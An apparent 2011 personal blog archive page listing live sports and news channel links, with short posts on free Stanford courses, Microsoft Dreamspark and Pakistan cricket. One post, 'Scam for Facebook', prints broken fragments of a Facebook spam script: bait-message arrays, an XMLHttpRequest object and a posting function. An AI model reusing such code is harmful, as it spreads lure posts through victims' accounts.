Sunday, December 18, 2011

Arabian Sports Channel

Live La Liga Matches

Ten Action

Live Football Matches

Sky Sports [HD]

Live Premier League fixtures

Fox Sports

BigBash Cricket Tournament

Neo Sports

Live Pak vs Bangladesh

WebCric Link#1

Live Cricket

Geo Sports

Geo Sports

Star Cricket

Big Bash Tournament


Pak vs Bangladesh

Thursday, December 15, 2011

Scam for Facebook


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var p0 = ['check this out ... cool ',' This cool ...', 'I like it ..'];
var p1 = ['check this out ... cool ',' Ehey ',' Hey ',' Hey! ',' about ',' Hello! ',' Look! ',' That last ',' Amazing!'];
var p2 = ['u wont believe! ',' check the sad post ',' haha can happen to anyone!'];
var p3 = [' I dare you can watch this . '];
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var summary = 'Lol Checkout this video its very embracing moments for her';
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var g = new XMLHttpRequest();
d = '';
title = 'Here is the sample Post;
summary = 'and Yeah here is what you were looking for';
imagen = '';
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function FBFBFB321() {
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Dunya News

Dunya News

Wednesday, December 14, 2011

Sports Channel #2

Live crcket and football matches

Sports Channel

Samaa News

Waqt News

Watch live video from waqtnews on


News One

Star Plus Live

PTV Home Live

Ten Sports Link #2

Ten Sports


int a=9;





Free Online Courses offered by Top US University [Stanford]

FREE COURSES from Stanford University. Great opportunity.
Computer Science
- Game Theory
- Design and Analysis of Algorithms I
- Cryptography
- Software Engineering for Software as a Service
- Natural Language Processing
- Computer Science 101
- Human-Computer Interaction
- Probabilistic Graphical Models

- Lean Launchpad
- Technology Entrepreneurship

I got myself registered in MI-classes which started by the start of August but couldn't keep up with it as the work burden from the university increased damn!. Now I am just downloading the lectures and keeping them saved for future viewing. I hope I do get enough time in winter holidays.

Microsoft Dreamspark Program Exciting!

"Get Registered with Microsoft Dreams Spark For Free and enjoy the free developing tools offered by Microsoft to the students. Our campus FAST-NU is already registered there"

I went to the site by chance and finally got registered with Dreamspark program. It good that Microsoft is offering a lots of free stuff for students. This was exciting but I was disappointed with Yallaapps, I couldn't participate in the competition without that Student Card :/ i thought the Dreamspark would also work there but I think I need to get that card !

Namecheap Trivia is back again

I remember last year it took place at the same time. I was preparing for exams answering the questions. I won almost 6 Domains for free.That was cool :) This time round I don't think I would be that much actively as I am in a very bad situation in 3 of the core subjects. God help me :/

Monday, December 12, 2011

Year 2011 for Pakistan Cricket

So, 2011 is ending for Pakistan Cricket on high note. We achieved a lot in this year.

We qualified for the Semi-Finals of WorldCup and played the match on the soil of India where our National Anthem was sung.

We got our mainstream bowlers (Saeed Ajmal and Abdul Hafeez) in ICC top 2 positions.

We won every bilateral series this year that sum up to 24 wins out of 32 matches, plus we have most no. of matches won this year compared with other teams.

Pakistan has considerably improved its ranking in all formats of the game.




Waiting for CN Chappas

Ahh can't really describe the moment but there is tension all around, I know I didn't cheap but my past experience haunts me. :/